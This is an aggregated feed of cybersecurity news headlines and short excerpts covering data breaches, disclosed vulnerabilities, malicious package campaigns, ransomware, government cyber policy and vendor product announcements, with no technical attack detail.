Japanese telco giant NTT Com says hackers accessed details of almost 18,000 organizations
Japanese telco giant NTT Com says hackers accessed details of almost 18,000 organizations

Unidentified hackers breached NTT Com’s network to steal personal information of employees at thousands of corporate customers

Read More
FBI says scammers are targeting US executives with fake BianLian ransom notes
FBI says scammers are targeting US executives with fake BianLian ransom notes

The FBI is warning that scammers are impersonating the BianLian ransomware gang using fake ransom notes sent to U.S. corporate executives. The fake ransom notes, first reported by U.S. cybersecurity company GuidePoint Security, claim that hackers have gained access to an organization’s network to steal sensitive data, and threaten to publish the stolen data unless […]

Read More
UK quietly scrubs encryption advice from government websites
UK quietly scrubs encryption advice from government websites

The UK is no longer recommending the use of encryption for at-risk groups following its iCloud backdoor demands

Read More
Broadcom urges VMware customers to patch ‘emergency’ zero-day bugs under active exploitation
Broadcom urges VMware customers to patch ‘emergency’ zero-day bugs under active exploitation

Security experts warn of ‘huge impact’ of actively exploited hypervisor flaws that allow sandbox escape

Read More
US said to halt offensive cyber operations against Russia
US said to halt offensive cyber operations against Russia

The reported policy shift comes as the U.S. government signals a change in its threat assessment of Russia

Read More
‘Uber for guns’ app Protector lets you hire armed bodyguards like you would an Uber — but does anyone need this?
‘Uber for guns’ app Protector lets you hire armed bodyguards like you would an Uber — but does anyone need this?

In a TikTok video with over 3 million views, a woman in a fluffy, maximalist coat sits in the back seat of a luxury SUV, parked in the middle of a New York City street. Atop the 6-second video, a line of text reads, “our bodyguards got us matcha.” The camera zooms in on two […]

Read More
Belgium investigating alleged cyberattack on intelligence agency by China-linked hackers
Belgium investigating alleged cyberattack on intelligence agency by China-linked hackers

The hackers reportedly exploited a flaw in US cybersecurity firm Barracuda’s software to access VSSE's email server

Read More
Recap of Our Presence at VivaTech 2025
Recap of Our Presence at VivaTech 2025

Our Core Expertise: Offshore Hosting & Advanced Cybersecurity At KoDDoS, we’ve built our reputation on two complementary pillars: 🛡️ Robust Cybersecurity Capabilities For over a decade, we’ve been protecting digital infrastructure with cutting-edge security technologies: 🌐 Resilient and Sovereign Offshore Hosting Our global infrastructure is distributed across strategic offshore data centers in: This setup offers … Continue reading Recap of Our Presence at VivaTech 2025

The post Recap of Our Presence at VivaTech 2025 appeared first on KoDDoS Blog.

Read More
KoDDoS at VivaTechnology 2025: A Strategic Presence at the Heart of Cybersecurity and AI Challenges.
KoDDoS at VivaTechnology 2025: A Strategic Presence at the Heart of Cybersecurity and AI Challenges.

Paris, June 2025 – From June 11 to 14, Paris will once again become the global epicenter of technological innovation with the return of VivaTechnology 2025, held at Paris Expo Porte de Versailles. Bringing together major tech companies, disruptive startups, global investors, and public institutions, the event stands out as a pivotal moment for the … Continue reading KoDDoS at VivaTechnology 2025: A Strategic Presence at the Heart of Cybersecurity and AI Challenges.

The post KoDDoS at VivaTechnology 2025: A Strategic Presence at the Heart of Cybersecurity and AI Challenges. appeared first on KoDDoS Blog.

Read More
Gamer Over? Why Hackers Target Popular Video Games & How to Stay Safe
Gamer Over? Why Hackers Target Popular Video Games & How to Stay Safe

Video games are more than entertainment; they’re a $200 billion global industry. But as gaming grows, so do cyberattacks. Hackers now see games as goldmines for stealing data, extorting companies, and exploiting players.  According to Infosecurity Magazine, Akamai’s 2024 report shows that attacks on gaming platforms are rising alarmingly. In 2024 alone, the industry suffered … Continue reading Gamer Over? Why Hackers Target Popular Video Games & How to Stay Safe

The post Gamer Over? Why Hackers Target Popular Video Games & How to Stay Safe appeared first on KoDDoS Blog.

Read More
How Social Media Use Can Create Hidden Cybersecurity Risks
How Social Media Use Can Create Hidden Cybersecurity Risks

Social media is all around us, helping us stay connected, updated, and entertained. But beneath the endless scroll, a darker reality exists. Hidden cybersecurity threats are growing- some obvious, others much harder to spot. The risks are especially alarming for young users. According to the National Institutes of Health, up to 95% of teens aged … Continue reading How Social Media Use Can Create Hidden Cybersecurity Risks

The post How Social Media Use Can Create Hidden Cybersecurity Risks appeared first on KoDDoS Blog.

Read More
KoDDoS at the InCyber ​​Europe 2025 Forum: a strategic participation at the heart of the European cyber ecosystem
KoDDoS at the InCyber ​​Europe 2025 Forum: a strategic participation at the heart of the European cyber ecosystem

From April 1st to 3rd, 2025, KoDDoS, a provider of specialized services in DDoS protection and secure offshore hosting, marked its presence at the InCyber ​​Europe Forum, held at the Lille Grand Palais. A true crossroads of cyber innovation and cooperation, the event is the largest cybersecurity event in Europe. A benchmark event on an … Continue reading KoDDoS at the InCyber ​​Europe 2025 Forum: a strategic participation at the heart of the European cyber ecosystem

The post KoDDoS at the InCyber ​​Europe 2025 Forum: a strategic participation at the heart of the European cyber ecosystem appeared first on KoDDoS Blog.

Read More
Looking back at CloudFest 2025: An essential event for the future of the cloud!
Looking back at CloudFest 2025: An essential event for the future of the cloud!

CloudFest is one of the world’s largest cloud computing events. Every year, it brings together the industry’s leading players to discuss the latest technological advancements, emerging trends, and market challenges. In 2025, the event once again cemented its leadership status by providing a dynamic platform for professional exchange and cloud innovation. This edition featured captivating … Continue reading Looking back at CloudFest 2025: An essential event for the future of the cloud!

The post Looking back at CloudFest 2025: An essential event for the future of the cloud! appeared first on KoDDoS Blog.

Read More
KoDDoS in Europe: A Strong Presence at Major Tech Events in Paris.
KoDDoS in Europe: A Strong Presence at Major Tech Events in Paris.

KoDDoS recently strengthened its commitment to the European tech scene by participating in several major events in France. Our team was honored to be invited to key gatherings in the tech industry, highlighting the importance of innovation and cybersecurity in the evolving digital ecosystem. This strategic tour in Paris allowed us to meet top-tier partners, … Continue reading KoDDoS in Europe: A Strong Presence at Major Tech Events in Paris.

The post KoDDoS in Europe: A Strong Presence at Major Tech Events in Paris. appeared first on KoDDoS Blog.

Read More
KoDDos Will be at CyberShow 2025 in Paris!
KoDDos Will be at CyberShow 2025 in Paris!

The post KoDDos Will be at CyberShow 2025 in Paris! appeared first on KoDDoS Blog.

Read More
Technological innovation in the heart of Los Angeles at the CES 2025 🚀
Technological innovation in the heart of Los Angeles at the CES 2025 🚀

🚀 Cutting-Edge Services KoDDoS has established itself as a key player in the field of high-performance hosting. Specializing in anti-DDoS protection, we ensure unmatched service continuity for our clients in the face of growing threats targeting digital infrastructures. We also invest in groundbreaking technologies, including Web3, blockchain, and the Internet of Things (IoT), providing tailored … Continue reading Technological innovation in the heart of Los Angeles at the CES 2025 🚀

The post Technological innovation in the heart of Los Angeles at the CES 2025 🚀 appeared first on KoDDoS Blog.

Read More
Recruitment Announcement: B2B Sales Representatives and Business Introducers
Recruitment Announcement: B2B Sales Representatives and Business Introducers

To meet growing demand and accelerate our growth, we are launching a new sales team. Weare looking for talented, ambitious, and motivated B2B sales representatives and businessintroducers who share our vision of a safer and more resilient internet. Job Profile:Position: B2B Sales Representatives and Business IntroducersAs a key member of our Sales Team, you will … Continue reading Recruitment Announcement: B2B Sales Representatives and Business Introducers

The post Recruitment Announcement: B2B Sales Representatives and Business Introducers appeared first on KoDDoS Blog.

Read More
Building a Cyber-Aware Workforce: Mexico's Push for Security Training
Building a Cyber-Aware Workforce: Mexico's Push for Security Training

Last year, Mexico was hit with 324 billion attempted cyberattacks, lending credence to the World Economic Forum's report that the country is the recipient of more than half of all cyber threats in Latin America. This does not bode well for the nation projected to rank 15th in world economies this year. The imperative is clear: Mexico and the businesses it supports need to bolster cybersecurity measures to withstand the disproportionate amount of cyber incidents they may be facing in the next 12 months. A recent report by FTI Consulting urges companies in Latin America to move beyond training...

Read More
Time for an IoT Audit?
Time for an IoT Audit?

IoT is everywhere, quietly powering everything from smart thermostats in homes to complex systems in industrial networks. While these devices bring incredible convenience and innovation, they also open the door to significant cybersecurity risks, especially in manufacturing and similarly sensitive sectors. The longer devices stay online, the more likely they are to become vulnerable due to outdated software, misconfigurations, or a lack of ongoing security management. If you haven’t already taken a hard look at your IoT setup, now is the perfect time to ask: Is it time for an IoT audit? Why...

Read More
Japan's Active Cyberdefense Law: A New Era in Cybersecurity Strategy
Japan's Active Cyberdefense Law: A New Era in Cybersecurity Strategy

On May 16 th, 2025, the Japanese Parliament enacted a landmark piece of cybersecurity legislation: the Japan Active Cyberdefense Law. It was a historic moment for the country's digital defense, empowering law enforcement and military agencies to conduct pre-emptive cyber operations before they materialize. However, the law doesn't just affect Japan's internal security posture; it reflects a global trend of nations and organizations reshaping their cyber defense strategies to keep pace with increasingly sophisticated, state-sponsored cybercrime. Let's explore it in a little more depth. The...

Read More
A New Era of Global Privacy Complexity
A New Era of Global Privacy Complexity

It's no longer enough for CIOs to check boxes and tick off compliance milestones. The world has changed — and with it, the data privacy landscape. From the GDPR in Europe to California's CCPA, and now Brazil's LGPD and India's DPDP, the patchwork of privacy laws continues to expand. What was once a series of siloed regional regulations has become a living, breathing global challenge. For CIOs leading enterprises that span borders, staying compliant isn't just about avoiding penalties. It's about trust. Reputation. Business continuity. And in a world where data is both an asset and a liability...

Read More
The Bullseye on Banks: Why Financial Services Remain a Prime Target for Cyberattacks
The Bullseye on Banks: Why Financial Services Remain a Prime Target for Cyberattacks

The frontlines of cybersecurity have long included the financial services sector, but today’s battlefield is increasingly asymmetric. Threat actors aren’t just going after the big-name banks with sprawling infrastructure and billion-dollar balance sheets. They’re targeting credit unions, wealth management firms, fintech startups, and insurance providers with the same determination and ferocity. What do these entities have that cybercriminals want? Plenty. They are united by their high-value data and direct pathways to financial gain. It’s no surprise then, that a recent report revealed that a...

Read More
SaaS Security in 2025: Why Visibility, Integrity, and Configuration Control Matter More Than Ever
SaaS Security in 2025: Why Visibility, Integrity, and Configuration Control Matter More Than Ever

Software-as-a-Service adoption is exploding, but security teams are struggling to keep up. The Cloud Security Alliance’s 2025 SaaS Security Survey has revealed that while investment in and attention to SaaS security are on the rise, genuine control remains elusive, especially when it comes to configuration management, identity governance, and visibility. According to the report, most SaaS security strategies are still fragmented and reactive, leaving organizations vulnerable to risks like misconfigurations, excessive privileges, and a lack of oversight over both human and non-human access. Let...

Read More
Why Agentic Security Doesn’t Mean Letting Go of Control
Why Agentic Security Doesn’t Mean Letting Go of Control

Autonomous agents are changing the way we think about security. Not in the distant future, right now. These systems (intelligent, self-directed, and capable of making decisions) are starting to play an active role in the SOC. They’re not only collecting data; they’re analyzing it, correlating alerts, prioritizing risks, and even initiating response actions. This is Agentic AI, and it makes people nervous. In security, autonomy often gets mistaken for loss of control. But here’s the thing: agentic doesn’t mean anarchic. The rise of agentic systems doesn’t mean the fall of human oversight. It...

Read More
Out-of-Band Update: Tripwire Enterprise 9.3.1
Out-of-Band Update: Tripwire Enterprise 9.3.1

Tripwire Enterprise 9.3.1 is now available for download in the Tripwire Customer Center. This is an out-of-band update initiated to address two issues discovered in our recent 9.3 release that we felt should be resolved before the next scheduled release cycle. We understand how critical it is for our customers to have accurate system information and reliable asset management capabilities, which is why we prioritized these fixes for immediate release. Our engineering team has been working diligently to resolve these issues and provide this out-of-band release. Resolved Issues The following...

Read More
Does Your Organization Need Deepfake Defenses?
Does Your Organization Need Deepfake Defenses?

Picture this: you're scrolling through your company's social media feed, and suddenly a video shows your CEO endorsing a competitor's product. It looks real. The voice, the gestures, the background—it's all perfect. Or that same CEO calling you to urgently approve a strange payment. But you know, deep down, it never happened. Welcome to the world of deepfakes, where fabricated videos can throw even the most vigilant organizations into disarray. Deepfakes have evolved from a fringe curiosity into a formidable cybersecurity threat. For businesses that thrive on trust—banks, law firms, healthcare...

Read More
Securing Against Phishing Beyond Email
Securing Against Phishing Beyond Email

Phishing is no longer just an email problem. Reports state that 40% of phishing campaigns now span channels beyond email, hitting collaboration tools like Slack and Teams, plus SMS, and social media platforms. Voice phishing (“vishing”) in particular is on the rise: 30% of surveyed organizations reported at least one instance of attackers using spoofed or AI-cloned calls to steal credentials in the past year. QR-code phishing (“quishing”) has also surged, growing 25% year-over-year as threat actors embed malicious codes in posters, invoices, and product packaging to redirect victims to fake...

Read More
Amazon ECS Internal Protocol Exploited to Steal AWS Credentials from Other Tasks
Amazon ECS Internal Protocol Exploited to Steal AWS Credentials from Other Tasks

Security researchers have disclosed a critical vulnerability in Amazon Elastic Container Service (ECS) that allows malicious containers to steal AWS credentials from other tasks running on the same EC2 instance. The attack, dubbed “ECScape,” exploits an undocumented internal protocol to impersonate the ECS agent and harvest privileged credentials without requiring container breakout. Vulnerability Overview The […]

The post Amazon ECS Internal Protocol Exploited to Steal AWS Credentials from Other Tasks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Read More
Malicious Go Packages Used by Threat Actors to Deploy Obfuscated Remote Payloads
Malicious Go Packages Used by Threat Actors to Deploy Obfuscated Remote Payloads

Socket’s Threat Research Team has identified eleven malicious Go packages distributed via GitHub, with ten remaining active on the Go Module Mirror, posing ongoing risks to developers and CI/CD pipelines. Eight of these packages employ typosquatting techniques, mimicking legitimate modules to exploit namespace confusion in Go’s decentralized ecosystem, where direct imports from repositories can lead […]

The post Malicious Go Packages Used by Threat Actors to Deploy Obfuscated Remote Payloads appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Read More
Over 60 Malicious RubyGems Packages Used to Steal Social Media and Marketing Credentials
Over 60 Malicious RubyGems Packages Used to Steal Social Media and Marketing Credentials

Socket’s Threat Research Team has exposed a persistent campaign involving over 60 malicious RubyGems packages that masquerade as automation tools for platforms like Instagram, Twitter/X, TikTok, WordPress, Telegram, Kakao, and Naver. Active since at least March 2023, the threat actor operating under aliases such as zon, nowon, kwonsoonje, and soonje has deployed these gems to […]

The post Over 60 Malicious RubyGems Packages Used to Steal Social Media and Marketing Credentials appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Read More
Flipper Zero Dark Web Firmware Cracks Rolling Code Security in Modern Cars
Flipper Zero Dark Web Firmware Cracks Rolling Code Security in Modern Cars

Security researchers have discovered alarming new firmware for the popular Flipper Zero device that can completely bypass the rolling code security systems protecting millions of modern vehicles. The breakthrough attack, demonstrated by YouTube channel Talking Sasquatch, represents a significant escalation in automotive cybersecurity threats, requiring only a single intercepted signal to compromise a vehicle’s entire […]

The post Flipper Zero Dark Web Firmware Cracks Rolling Code Security in Modern Cars appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Read More
CISA Issues Urgent Advisory to Address Microsoft Exchange Flaw
CISA Issues Urgent Advisory to Address Microsoft Exchange Flaw

The Cybersecurity and Infrastructure Security Agency (CISA) has issued Emergency Directive 25-02 on August 7, 2025, requiring federal agencies to immediately address a critical vulnerability in Microsoft Exchange hybrid configurations that could allow attackers to escalate from on-premises systems to cloud environments. Critical Security Vulnerability Discovered CISA has identified a post-authentication vulnerability designated CVE-2025-53786 affecting […]

The post CISA Issues Urgent Advisory to Address Microsoft Exchange Flaw appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Read More
Retbleed Vulnerability Exploited to Access Any Process’s Memory on Newer CPUs
Retbleed Vulnerability Exploited to Access Any Process’s Memory on Newer CPUs

Security researchers have successfully demonstrated a sophisticated exploit of the Retbleed vulnerability, a critical CPU security flaw that allows attackers to read arbitrary memory from any process running on affected systems. The exploit, which builds upon research originally published by ETH Zürich in 2022, showcases how modern processor vulnerabilities continue to pose significant threats to system […]

The post Retbleed Vulnerability Exploited to Access Any Process’s Memory on Newer CPUs appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Read More
ChatGPT-5 Launches – Discover What’s New in the Next-Gen AI Agent
ChatGPT-5 Launches – Discover What’s New in the Next-Gen AI Agent

OpenAI has officially launched ChatGPT-5, marking a significant leap forward in artificial intelligence technology with a revolutionary unified system that combines multiple specialized models to deliver unprecedented performance and versatility. The launch represents the most substantial advancement in conversational AI since the debut of its predecessors, introducing groundbreaking capabilities that promise to transform how users […]

The post ChatGPT-5 Launches – Discover What’s New in the Next-Gen AI Agent appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Read More
10 Best Red Teaming Companies for Advanced Attack Simulation in 2025
10 Best Red Teaming Companies for Advanced Attack Simulation in 2025

Red teaming companies are specialized cybersecurity firms that use a proactive, adversarial approach to test an organization’s defenses by simulating a real-world cyberattack. Unlike traditional penetration testing, which typically focuses on finding specific vulnerabilities, red teaming emulates the tactics, techniques, and procedures (TTPs) of an advanced persistent threat (APT) actor. The goal is to evaluate […]

The post 10 Best Red Teaming Companies for Advanced Attack Simulation in 2025 appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Read More
How Machine Learning Detects Living off the Land (LotL) Attacks
How Machine Learning Detects Living off the Land (LotL) Attacks

Elite cybercriminals prefer LotL attacks because they’re incredibly hard to spot. Instead of deploying obvious malware, attackers use the same trusted tools that an IT team relies on daily, such as PowerShell, Windows Management Instrumentation (WMI) and various integrated utilities on almost every computer. When attackers use legitimate system tools, traditional security software thinks everything […]

The post How Machine Learning Detects Living off the Land (LotL) Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Read More
HashiCorp Vault 0-Day Flaws Enable Remote Code Execution Attacks
HashiCorp Vault 0-Day Flaws Enable Remote Code Execution Attacks

Researchers at Cyata have disclosed nine previously unknown zero-day vulnerabilities in HashiCorp Vault, a widely adopted open-source secrets management platform, enabling attackers to bypass authentication, escalate privileges, and achieve remote code execution (RCE). These flaws, assigned CVEs through responsible disclosure and patched in collaboration with HashiCorp, stem from subtle logic errors in core components like […]

The post HashiCorp Vault 0-Day Flaws Enable Remote Code Execution Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Read More
Federal courts to ramp up filing system security after ‘recent escalated cyberattacks’
Federal courts to ramp up filing system security after ‘recent escalated cyberattacks’

The statement from the U.S. court system follows reports that the judiciary suffered a recent cyber breach.

The post Federal courts to ramp up filing system security after ‘recent escalated cyberattacks’ appeared first on CyberScoop.

Read More
BlackSuit, Royal ransomware group hit over 450 US victims before last month’s takedown
BlackSuit, Royal ransomware group hit over 450 US victims before last month’s takedown

The Department of Homeland Security said the Russian cybercrime collective received at least $370 million in ransom payments, based on current cryptocurrency valuations.

The post BlackSuit, Royal ransomware group hit over 450 US victims before last month’s takedown appeared first on CyberScoop.

Read More
CISA, Microsoft warn organizations of high-severity Microsoft Exchange vulnerability
CISA, Microsoft warn organizations of high-severity Microsoft Exchange vulnerability

The public disclosure and advisories came late Wednesday during Black Hat, but Microsoft said the timing was coordinated.

The post CISA, Microsoft warn organizations of high-severity Microsoft Exchange vulnerability appeared first on CyberScoop.

Read More
Nigerian accused of hacking tax preparation businesses extradited to US
Nigerian accused of hacking tax preparation businesses extradited to US

Prosecutors accuse Chukwuemeka Victor Amachukwu, who was arrested in France, of multiple fraud schemes, including tax refund fraud and identity theft.

The post Nigerian accused of hacking tax preparation businesses extradited to US appeared first on CyberScoop.

Read More
New National Cyber Director Cairncross faces challenges on policy, bureaucracy, threats
New National Cyber Director Cairncross faces challenges on policy, bureaucracy, threats

It’s a “pivotal” moment for Sean Cairncross, fresh off his Senate confirmation in a changing federal cyber landscape.

The post New National Cyber Director Cairncross faces challenges on policy, bureaucracy, threats appeared first on CyberScoop.

Read More
SonicWall firewalls hit by active mass exploitation of suspected zero-day
SonicWall firewalls hit by active mass exploitation of suspected zero-day

About 20 organizations have been impacted and the pace of attacks is rising. Threat researchers and SonicWall are scrambling to determine the root cause.

The post SonicWall firewalls hit by active mass exploitation of suspected zero-day appeared first on CyberScoop.

Read More
Why identity is the definitive cyber defense for federal agencies
Why identity is the definitive cyber defense for federal agencies

As adversaries leverage AI to mimic user behavior, agencies must adopt dynamic identity architectures to verify every interaction and safeguard critical missions continuously.

The post Why identity is the definitive cyber defense for federal agencies appeared first on CyberScoop.

Read More
Iranian hackers were more coordinated, aligned during Israel conflict than it seemed
Iranian hackers were more coordinated, aligned during Israel conflict than it seemed

SecurityScorecard and the Middle East Institute said in separate reports this week that Iranian hacker operations during the 12-day conflict exhibited clear strategic intent.

The post Iranian hackers were more coordinated, aligned during Israel conflict than it seemed appeared first on CyberScoop.

Read More
Google addresses six vulnerabilities in August’s Android security update
Google addresses six vulnerabilities in August’s Android security update

Android partners and customers have experienced a temporary respite from double-digit vulnerabilities this summer. Google issued no security patches in its update last month.

The post Google addresses six vulnerabilities in August’s Android security update appeared first on CyberScoop.

Read More
AI company Perplexity is sneaking to get around blocks on crawlers, Cloudflare alleges
AI company Perplexity is sneaking to get around blocks on crawlers, Cloudflare alleges

Cloudflare said it received complaints from customers about Perplexity using stealthy tactics to evade network blocks against systematic browsing and scraping of web pages.

The post AI company Perplexity is sneaking to get around blocks on crawlers, Cloudflare alleges appeared first on CyberScoop.

Read More
SonicWall dismisses zero-day fears after Ransomware probe
SonicWall dismisses zero-day fears after Ransomware probe

SonicWall found no evidence of a new vulnerability after probing reports of a zero-day used in ransomware attacks. SonicWall investigated claims of a zero-day being used in ransomware attacks but found no evidence of any new vulnerability in its products. SonicWall launched the investigation after a surge in Akira ransomware attacks targeting Gen 7 firewalls with SSLVPN […]

Read More
Air France and KLM disclosed data breaches following the hack of a third-party platform
Air France and KLM disclosed data breaches following the hack of a third-party platform

Air France and KLM warn of a data breach exposing customer data via unauthorized access to a third-party platform. Air France and KLM reported a data breach after hackers accessed a third-party platform, potentially exposing some customers’ personal information. Both airlines confirmed that threat actors gained access to the platform of an unnamed service provider […]

Read More
CISA, Microsoft warn of critical Exchange hybrid flaw CVE-2025-53786
CISA, Microsoft warn of critical Exchange hybrid flaw CVE-2025-53786

CISA and Microsoft warn of CVE-2025-53786, a high-severity Exchange flaw allowing privilege escalation in hybrid cloud environments. CISA and Microsoft warn of a high-severity flaw, tracked as CVE-2025-53786, in Exchange hybrid deployments that allows attackers to escalate privileges in cloud setups. Microsoft address the vulnerability in Exchange Server 2016, 2019 and Subscription Edition RTM. The […]

Read More
Microsoft unveils Project Ire: AI that autonomously detects malware
Microsoft unveils Project Ire: AI that autonomously detects malware

Microsoft’s Project Ire uses AI to autonomously reverse engineer and classify software as malicious or benign. Microsoft announced Project Ire, an autonomous artificial intelligence (AI) system that can autonomously reverse engineer and classify software. Project Ire is an LLM-powered autonomous malware classification system that uses decompilers and other tools, reviews their output, and determines the […]

Read More
CERT-UA warns of UAC-0099 phishing attacks targeting Ukraine’s defense sector
CERT-UA warns of UAC-0099 phishing attacks targeting Ukraine’s defense sector

Ukraine’s CERT-UA warns of phishing attacks by UAC-0099 targeting defense sectors, using malware like MATCHBOIL, MATCHWOK, and DRAGSTARE. Ukraine’s CERT-UA warns of phishing attacks by threat actor UAC-0099 targeting government and defense sectors, delivering malware like MATCHBOIL and DRAGSTARE. The National Cyber Incident, Cyber Attack, and Cyber Threat Response Team CERT-UA investigated multiple attacks against […]

Read More
Over 100 Dell models exposed to critical ControlVault3 firmware bugs
Over 100 Dell models exposed to critical ControlVault3 firmware bugs

ReVault flaws in Dell ControlVault3 firmware allow firmware implants and Windows login bypass on 100+ laptop models via physical access. Cisco Talos reported five vulnerabilities collectively named ReVault (tracked as CVE-2025-24311, CVE-2025-25215, CVE-2025-24922, CVE-2025-25050, and CVE-2025-24919) in Dell’s ControlVault3 firmware that expose over 100 laptop models to firmware implants and Windows login bypass via physical […]

Read More
How CTEM Boosts Visibility and Shrinks Attack Surfaces in Hybrid and Cloud Environments
How CTEM Boosts Visibility and Shrinks Attack Surfaces in Hybrid and Cloud Environments

CTEM is a continuous strategy that assesses risk from an attacker’s view, helping orgs prioritize threats across cloud and hybrid environments. The attack surface has exploded. Between multi-cloud deployments, remote endpoints, SaaS platforms, shadow IT, and legacy infrastructure, the perimeter has not only become unrecognizable; in many ways, it no longer exists. For security teams, […]

Read More
WhatsApp cracks down on 6.8M scam accounts in global takedown
WhatsApp cracks down on 6.8M scam accounts in global takedown

WhatsApp removed 6.8M accounts linked to global scam centers, mainly in Cambodia, in a crackdown with Meta and OpenAI. Meta announced that WhatsApp has removed 6.8 million accounts tied to criminal scam centers, mainly in Cambodia, in a joint effort with OpenAI. Scam centers run multiple schemes, often requiring upfront payment for fake returns. Fraudulent […]

Read More
Trend Micro fixes two actively exploited Apex One RCE flaws
Trend Micro fixes two actively exploited Apex One RCE flaws

Trend Micro patched two critical Apex One flaws (CVE-2025-54948, CVE-2025-54987) exploited in the wild, allowing RCE via console injection. Trend Micro released fixes for two critical vulnerabilities, tracked as CVE-2025-54948 and CVE-2025-54987 (CVSS score of 9.4), in Apex One on-prem consoles. The cybersecurity vendor confirmed that both issues were actively exploited in the wild. Both […]

Read More
U.S. CISA adds D-Link cameras and Network Video Recorder flaws to its Known Exploited Vulnerabilities catalog
U.S. CISA adds D-Link cameras and Network Video Recorder flaws to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds D-Link cameras and Network Video Recorder flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Cisco ISE and PaperCut NG/MF flaws to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for these flaws: According to Binding Operational Directive (BOD) 22-01: […]

Read More
Black Duck Announces Enhancements to AI Powered Application Security Assistant
Black Duck Announces Enhancements to AI Powered Application Security Assistant

Black Duck has unveiled Black Duck Assist, which enables developers to find and fix security and compliance issues in human and AI-generated code in real time. Black Duck Assist is now woven into the company’s Code Sight™ IDE plugin. These updates introduce automated scanning of AI-generated code and AI-powered remediation guidance, bringing continuous code protection […]

The post Black Duck Announces Enhancements to AI Powered Application Security Assistant appeared first on IT Security Guru.

Read More
Jen Easterly Joins Huntress Strategic Advisory Board
Jen Easterly Joins Huntress Strategic Advisory Board

Jen Easterly, the former Director of the U.S. Cybersecurity and Infrastructure Security Agency (CISA), has taken up a seat on the Strategic Advisory Board of Huntress. In this new role, she will help drive the company’s innovation efforts, foster key partnerships, and support its mission to safeguard businesses of all sizes against the ever-evolving landscape […]

The post Jen Easterly Joins Huntress Strategic Advisory Board appeared first on IT Security Guru.

Read More
Surge in zero-day exploits identified in Forescout’s latest threat report
Surge in zero-day exploits identified in Forescout’s latest threat report

Forescout Technologies, Inc. today released its 2025H1 Threat Review, an analysis of more than 23,000 vulnerabilities and 885 threat actors across 159 countries worldwide during the first half of 2025. Among the key findings: ransomware attacks are averaging 20 incidents per day, zero-day exploits increased 46 percent, and attackers increasingly targeting non-traditional equipment, such as […]

The post Surge in zero-day exploits identified in Forescout’s latest threat report appeared first on IT Security Guru.

Read More
Identity Security: The New Perimeter for Cloud Security Companies Using CNAPP
Identity Security: The New Perimeter for Cloud Security Companies Using CNAPP

In a cloud-native world, your network is no longer your perimeter; identity is.   Every user, workload and service account is an entry point. And every entry point has permissions. The problem? Most of those permissions are excessive, unnecessary or never revoked.   In fact, according to Tenable research, more than 90% of cloud identities use […]

The post Identity Security: The New Perimeter for Cloud Security Companies Using CNAPP appeared first on IT Security Guru.

Read More
One Week of the Online Safety Act: Cyber Experts Weigh In
One Week of the Online Safety Act: Cyber Experts Weigh In

The conversation around the UK’s Online Safety Act has transformed over the past week. Since it came into force last Friday (25th July 2025), there has been a lot of public outcry, including a petition, which was signed by over 400,000 people, calling for The Act to be scrapped altogether. The UK government has since […]

The post One Week of the Online Safety Act: Cyber Experts Weigh In appeared first on IT Security Guru.

Read More
Salt Security Unveils Salt Surface to Expose Hidden API Risks
Salt Security Unveils Salt Surface to Expose Hidden API Risks

API security company Salt Security has announced the launch of Salt Surface, a new capability integrated into its existing API Protection Platform. Salt Surface provides organisations with a comprehensive API attack surface assessment, delivering an attacker’s-eye view of their public-facing APIs to uncover specific, actionable risks before they can be exploited. Salt Surface is an […]

The post Salt Security Unveils Salt Surface to Expose Hidden API Risks appeared first on IT Security Guru.

Read More
Ransomware Payment Bans: Prevention Strategy or Misguided Policy?
Ransomware Payment Bans: Prevention Strategy or Misguided Policy?

It’s no secret that ransomware is on the rise, as this escalation is echoed across numerous industry reports. The Verizon 2025 Data Breach Investigations Report (DBIR), for instance, starkly illustrates this reality, revealing that ransomware (with or without encryption) was present in 44% of all breaches reviewed. This marks a substantial 37% increase from their […]

The post Ransomware Payment Bans: Prevention Strategy or Misguided Policy? appeared first on IT Security Guru.

Read More
Keeper Security Releases Mobile Platform Updates for iOS and Android
Keeper Security Releases Mobile Platform Updates for iOS and Android

Keeper Security has announced significant updates to its mobile apps for iOS and Android. The updates will bring users a smarter, smoother and more secure way to manage passwords, passkeys and sensitive data on the go. The updated Keeper mobile apps will be available in app stores soon.  As smartphones become a primary point of […]

The post Keeper Security Releases Mobile Platform Updates for iOS and Android appeared first on IT Security Guru.

Read More
Saviynt Accelerates Global Expansion in Europe, Asia Pacific, Japan, and the Middle East
Saviynt Accelerates Global Expansion in Europe, Asia Pacific, Japan, and the Middle East

Identity security leader Saviynt has announced a major global expansion, opening new offices in London and Singapore, launching dedicated customer operations in Europe, and preparing for a significantly larger presence in India. The moves come amid growing demand for its AI-powered Identity Cloud platform and follow a record-breaking 2024. The expanded footprint underscores Saviynt’s ambitions […]

The post Saviynt Accelerates Global Expansion in Europe, Asia Pacific, Japan, and the Middle East appeared first on IT Security Guru.

Read More
Check Point CloudGuard WAF Expands in UK With New PoP
Check Point CloudGuard WAF Expands in UK With New PoP

Check Point is accelerating its Web Application and API Protection (WAAP) expansion with the launch of new CloudGuard WAF Points of Presence (PoPs) in key strategic markets. The new instance is part of a broader CloudGuard WAF expansion, with additional launches planned in Brazil, Germany, and Taiwan in 2025. Today, the company announced the activation […]

The post Check Point CloudGuard WAF Expands in UK With New PoP appeared first on IT Security Guru.

Read More
Risk Has Moved Beyond Your Inbox
Risk Has Moved Beyond Your Inbox

For years, email was the main security battleground. Phishing, scams, and account takeovers were problems companies knew how to fight—at least in theory. Secure email gateways, AI-driven detection, relentless user...

The post Risk Has Moved Beyond Your Inbox appeared first on Cyber Defense Magazine.

Read More
Retail Budgets at Risk: Price-Scraping and Fraudulent Bot Attacks Are on The Rise
